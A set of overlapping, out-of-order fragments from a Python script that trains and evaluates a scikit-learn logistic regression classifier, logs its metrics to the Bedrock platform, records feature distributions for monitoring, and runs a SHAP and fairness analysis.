"category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric values",
"recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot,",
"dataset and returns the features as a pandas dataframe and the target variable",
"y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and",
"score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This",
"inference distribution.') # Train Shap model and calculate xafai metrics analyzer = (",
"verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose",
"ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model",
"= 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the features and",
"inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped",
"compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log",
"StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\")",
"= {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics",
"from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector )",
"('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame,",
"= StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model",
"test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def main(): x_train, y_train",
"in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric values #",
"boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics from sklearn.linear_model",
"pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target",
"indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1))",
"# Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision,",
"features and trains a logistic regression model. :param X: Features for training :type",
"and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y)",
"test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc",
"to print additional info :type verbose: bool :return: Pipeline of transforms with a",
".test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__':",
"from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from",
"privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group",
"{num_rows_dropped} rows with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df,",
"discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature",
"environs import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline",
"FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH)",
"Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\":",
"x_test, y_test, y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors",
"n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1))",
"{value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect both features",
"Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len -",
"Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded",
"value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable to numeric",
"inference to be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1)",
"inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, #",
"\"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } }",
":rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose",
"= ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved",
"group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str, target:",
"import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import",
":param seed: `random_state` for logistic regression model :type seed: float :param C: Inverse",
"f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) =",
"discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors)",
"# Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len",
"https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to use the same",
"= pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall =",
"dataframe and the target variable as a numpy array. :param filepath: Path to",
"to numeric values # ModelMonitoringService.export_text expect both features # and inference to be",
"seed: float :param C: Inverse of regularization strength :type C: float :param verbose:",
"print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe],",
"axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float =",
"def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset(",
"= metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy =",
"= (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0,",
"1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target",
"precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test,",
"enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert",
"print(f'{category} : {value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect",
"y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y:",
"(macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc,",
"encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) #",
"f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\"",
"# list of float ) return test_prob, test_pred def main(): x_train, y_train =",
"env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C",
"= np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C,",
"= MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.')",
"training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\"",
".fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if __name__",
"int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def main(): x_train,",
"group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name",
"= pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column",
"(train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with",
"str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features as",
"\"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing",
"scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test:",
"df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float",
"metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) )",
"Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline",
"variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type seed:",
":param filepath: Path to load the data :type filepath: str :param target: Target",
"assumes binary classification # For multiclass labels, we can use a \"micro-average\" by",
"by # quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa:",
"pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector",
"Pipeline of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test:",
"= pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len =",
"pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1, verbose: bool",
":type C: float :param verbose: Whether to print additional info :type verbose: bool",
"and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot:",
"bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\":",
"Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features as a pandas",
"f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc =",
"print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose",
"precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\":",
"BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env from",
"(macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model",
"as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and",
"np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import",
"[0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def",
"import joblib from typing import Tuple import bdrk import numpy as np import",
"of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...')",
"are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder =",
"Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train)",
"} ) # `log_chart_data` assumes binary classification # For multiclass labels, we can",
"= metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall",
":return: The features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray]",
"def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and",
"target variable to numeric values # ModelMonitoringService.export_text expect both features # and inference",
"# `log_chart_data` assumes binary classification # For multiclass labels, we can use a",
"Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type",
"= [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete",
"encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions",
"= load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score`",
"NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X:",
"verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0])",
"C: float :param verbose: Whether to print additional info :type verbose: bool :return:",
":param verbose: Whether to print additional info :type verbose: bool :return: Pipeline of",
"MetricEncoder from environs import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression",
":type target: str :return: The features pandas dataframe and the target numpy array",
"load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)')",
"discrete={7, 8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) #",
"acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC",
"f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( {",
"test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance distribution",
"numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] >",
"predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred =",
"list of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def",
"\"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads",
"\"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes",
"= original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows",
"logistic regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y:",
"as a numpy array. :param filepath: Path to load the data :type filepath:",
"max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)])",
"feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained",
"the dataset and returns the features as a pandas dataframe and the target",
"X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed,",
"= {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") #",
"on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will",
":type verbose: bool :return: Pipeline of transforms with a trained final estimator :rtype:",
"Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f:",
"env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\":",
"precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification # For multiclass",
"numpy.ndarray :param seed: `random_state` for logistic regression model :type seed: float :param C:",
"# Convert target variable to numeric values # ModelMonitoringService.export_text expect both features #",
":param C: Inverse of regularization strength :type C: float :param verbose: Whether to",
"Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and",
"jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to",
"{acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) =",
"def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and",
"C: Inverse of regularization strength :type C: float :param verbose: Whether to print",
"verbose: Whether to print additional info :type verbose: bool :return: Pipeline of transforms",
"captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall,",
"a pandas dataframe and the target variable as a numpy array. :param filepath:",
"# noqa: E501 # This will allow us to use the same `log_chart_data`",
"sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category",
") return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' )",
"and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc",
"x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score`",
"filepath: str :param target: Target variable :type target: str :return: The features pandas",
"analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init() with",
"the data :type filepath: str :param target: Target variable :type target: str :return:",
"x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param",
"train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which",
"= len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped >",
"average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\"",
"pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector,",
"target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) #",
"\"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification # For",
"model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test)",
"Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\")",
"y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0,",
"trains a logistic regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame",
"we can use a \"micro-average\" by # quantifying score on all classes jointly",
"import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env =",
"model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness",
"axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names",
"0, C: float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales",
"print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved",
"y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted",
":type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type seed: float",
"For multiclass labels, we can use a \"micro-average\" by # quantifying score on",
"See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to use the",
"df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len",
"= metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob,",
"(macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\"",
"float :param verbose: Whether to print additional info :type verbose: bool :return: Pipeline",
"with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling =",
"testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type",
"hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot)",
"average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\"",
"inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0,",
"numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return:",
"allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of",
"and inference distribution.') # Train Shap model and calculate xafai metrics analyzer =",
"y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline of transforms",
"numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train,",
"of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features",
"= pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred,",
"column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ]",
"with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing",
"info :type verbose: bool :return: Pipeline of transforms with a trained final estimator",
"Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name",
"import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder",
"with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot",
"for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data",
"is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\")",
":return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose",
"= enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') #",
"verbose: bool :return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline",
"roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification #",
"pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def",
"and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining",
"\"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0],",
"[ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete ),",
"= load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X",
"env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding",
"ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder",
"from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH =",
"the target variable as a numpy array. :param filepath: Path to load the",
"Scales the features and trains a logistic regression model. :param X: Features for",
":type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test:",
"{avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\":",
"binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot =",
"avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\"",
"[1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], #",
"model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names",
"import Tuple import bdrk import numpy as np import pandas as pd from",
"labels, we can use a \"micro-average\" by # quantifying score on all classes",
"seed: `random_state` for logistic regression model :type seed: float :param C: Inverse of",
"y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline",
"= {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro)",
"Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall",
"# Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference",
"pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test,",
"\"\"\" Loads the dataset and returns the features as a pandas dataframe and",
"metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro',",
"StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model =",
") # `log_chart_data` assumes binary classification # For multiclass labels, we can use",
"filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train)",
"str :return: The features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame,",
"`random_state` for logistic regression model :type seed: float :param C: Inverse of regularization",
"C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name:",
"# Train Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic',",
"trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test:",
"in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and",
"precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg",
"float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the features",
"logistic regression model :type seed: float :param C: Inverse of regularization strength :type",
"def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1,",
"print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable",
